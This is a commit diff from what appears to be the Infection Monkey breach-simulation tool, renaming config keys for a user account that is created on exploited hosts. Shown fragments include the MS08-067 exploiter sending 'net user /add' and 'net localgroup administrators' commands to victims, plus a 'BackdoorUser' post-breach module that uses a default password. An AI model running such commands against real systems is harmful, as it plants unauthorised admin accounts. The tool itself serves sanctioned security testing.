Rename ms08_067_remote_user_add and ms08_067_remote_user_pass to something more generic

2019-01-07 10:58:20 +02:00 · 2019-01-07 10:58:20 +02:00 · 68093d084f
parent 70545d28f8
commit 68093d084f
6 changed files with 18 additions and 18 deletions
--- a/monkey/infection_monkey/config.py
+++ b/monkey/infection_monkey/config.py
@ -208,8 +208,8 @@ class Configuration(object):
    skip_exploit_if_file_exist = False

    ms08_067_exploit_attempts = 5
-    ms08_067_remote_user_add = "Monkey_IUSER_SUPPORT"
-    ms08_067_remote_user_pass = "Password1!"
+    user_to_add = "Monkey_IUSER_SUPPORT"
+    remote_user_pass = "Password1!"

    # rdp exploiter
    rdp_use_vbs_download = True
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@ -57,8 +57,8 @@
    "monkey_log_path_linux": "/tmp/user-1563",
    "send_log_to_server": true,
    "ms08_067_exploit_attempts": 5,
-    "ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
-    "ms08_067_remote_user_pass": "Password1!",
+    "user_to_add": "Monkey_IUSER_SUPPORT",
+    "remote_user_pass": "Password1!",
    "ping_scan_timeout": 10000,
    "rdp_use_vbs_download": true,
    "smb_download_timeout": 300,
--- a/monkey/infection_monkey/exploit/win_ms08_067.py
+++ b/monkey/infection_monkey/exploit/win_ms08_067.py
@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):

                sock.send("cmd /c (net user %s %s /add) &&"
                          " (net localgroup administrators %s /add)\r\n" %
-                          (self._config.ms08_067_remote_user_add,
-                           self._config.ms08_067_remote_user_pass,
-                           self._config.ms08_067_remote_user_add))
+                          (self._config.user_to_add,
+                           self._config.remote_user_pass,
+                           self._config.user_to_add))
                time.sleep(2)
                reply = sock.recv(1000)

@ -213,8 +213,8 @@ class Ms08_067_Exploiter(HostExploiter):
        remote_full_path = SmbTools.copy_file(self.host,
                                              src_path,
                                              self._config.dropper_target_path_win_32,
-                                              self._config.ms08_067_remote_user_add,
-                                              self._config.ms08_067_remote_user_pass)
+                                              self._config.user_to_add,
+                                              self._config.remote_user_pass)

        if not remote_full_path:
            # try other passwords for administrator
@ -240,7 +240,7 @@ class Ms08_067_Exploiter(HostExploiter):

        try:
            sock.send("start %s\r\n" % (cmdline,))
-            sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
+            sock.send("net user %s /delete\r\n" % (self._config.user_to_add,))
        except Exception as exc:
            LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
            return False
--- a/monkey/infection_monkey/post_breach/add_user.py
+++ b/monkey/infection_monkey/post_breach/add_user.py
@ -36,14 +36,14 @@ class BackdoorUser(object):
    def add_user_linux():
        cmd_line = ['useradd', '-M', '--expiredate',
                    datetime.datetime.today().strftime('%Y-%m-%d'), '--inactive', '0', '-c', 'MONKEY_USER',
-                    WormConfiguration.ms08_067_remote_user_add]
+                    WormConfiguration.user_to_add]
        retval = subprocess.call(cmd_line)
        return retval

    @staticmethod
    def add_user_windows():
-        cmd_line = ['net', 'user', WormConfiguration.ms08_067_remote_user_add,
-                    WormConfiguration.ms08_067_remote_user_pass,
+        cmd_line = ['net', 'user', WormConfiguration.user_to_add,
+                    WormConfiguration.remote_user_pass,
                    '/add', '/ACTIVE:NO']
        retval = subprocess.call(cmd_line)
        return retval
--- a/monkey/infection_monkey/system_info/windows_info_collector.py
+++ b/monkey/infection_monkey/system_info/windows_info_collector.py
@ -36,7 +36,7 @@ class WindowsInfoCollector(InfoCollector):
        """
        LOG.debug("Running Windows collector")
        super(WindowsInfoCollector, self).get_info()
-        self.get_wmi_info()
+        #self.get_wmi_info()
        self.get_installed_packages()
        from infection_monkey.config import WormConfiguration
        if WormConfiguration.should_use_mimikatz:
--- a/monkey/monkey_island/cc/services/config_schema.py
+++ b/monkey/monkey_island/cc/services/config_schema.py
@ -701,14 +701,14 @@ SCHEMA = {
                            "default": 5,
                            "description": "Number of attempts to exploit using MS08_067"
                        },
-                        "ms08_067_remote_user_add": {
-                            "title": "MS08_067 remote user",
+                        "user_to_add": {
+                            "title": "Remote user",
                            "type": "string",
                            "default": "Monkey_IUSER_SUPPORT",
                            "description": "Username to add on successful exploit"
                        },
-                        "ms08_067_remote_user_pass": {
-                            "title": "MS08_067 remote user password",
+                        "remote_user_pass": {
+                            "title": "Remote user password",
                            "type": "string",
                            "default": "Password1!",
                            "description": "Password to use for created user"